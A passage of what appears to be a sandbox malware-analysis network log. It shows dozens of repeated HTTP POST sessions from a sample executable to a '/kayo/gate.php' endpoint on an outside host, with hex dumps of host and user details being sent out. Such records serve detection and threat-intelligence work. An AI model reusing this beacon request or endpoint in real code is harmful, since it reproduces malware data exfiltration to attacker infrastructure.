                                            3192.168.2.34972635.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:48.534118891 CEST1150OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:48.780030966 CEST1150OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:49.245944023 CEST1150INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            30192.168.2.34976135.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:25.936889887 CEST1268OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:26.185467958 CEST1269OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:26.651922941 CEST1269INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            31192.168.2.34976235.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:27.173146009 CEST1270OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:27.419480085 CEST1270OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:27.884638071 CEST1270INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            32192.168.2.34976335.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:28.395925999 CEST1271OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:28.641087055 CEST1271OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:29.105942011 CEST1272INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            33192.168.2.34976435.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:29.651952982 CEST1272OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:29.899702072 CEST1273OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:30.365235090 CEST1273INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            34192.168.2.34976535.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:30.895102978 CEST1282OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:31.140486956 CEST1324OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:31.602879047 CEST1325INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            35192.168.2.34976635.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:32.208436012 CEST1325OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:32.457886934 CEST1326OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:33.094299078 CEST1326INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            36192.168.2.34976735.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:33.595262051 CEST1327OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:33.841697931 CEST1331OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:34.339798927 CEST1337INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:34 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            37192.168.2.34976935.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:35.143655062 CEST1343OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:35.396190882 CEST1352OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:35.863095999 CEST3735INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:36 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            38192.168.2.34977435.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:36.416202068 CEST4730OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:36.661104918 CEST4733OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:37.123349905 CEST4737INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:37 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            39192.168.2.34977535.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:37.810117960 CEST4738OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:38.055672884 CEST4738OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:38.525527954 CEST4738INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:38 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.34972735.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:49.841094971 CEST1151OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:50.088618994 CEST1151OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:50.552958965 CEST1152INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            40192.168.2.34977635.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:39.063488007 CEST6031OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:39.319890976 CEST6047OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:39.786050081 CEST6047INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:40 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            41192.168.2.34977735.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:40.333359003 CEST6048OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:40.580059052 CEST6049OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:41.045489073 CEST6049INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            42192.168.2.34977835.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:41.793612957 CEST6050OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:42.042092085 CEST6050OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:42.508225918 CEST6050INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            43192.168.2.34977935.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:43.006592035 CEST6051OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:43.256814003 CEST6051OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:43.724215031 CEST6052INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            44192.168.2.34978035.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:44.271004915 CEST6052OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:44.519397974 CEST6053OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:44.985843897 CEST6053INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:45 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            45192.168.2.34978135.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:45.490786076 CEST6054OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:45.739958048 CEST6054OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:46.207195044 CEST6054INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            46192.168.2.34978235.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:46.703121901 CEST6055OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:46.949304104 CEST6055OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:47.425873041 CEST6056INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:47 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            47192.168.2.34978335.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:19:47.909071922 CEST6057OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:48.154562950 CEST6057OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:48.625330925 CEST6057INHTTP/1.1 404 Not Found
                                            Server: nginx
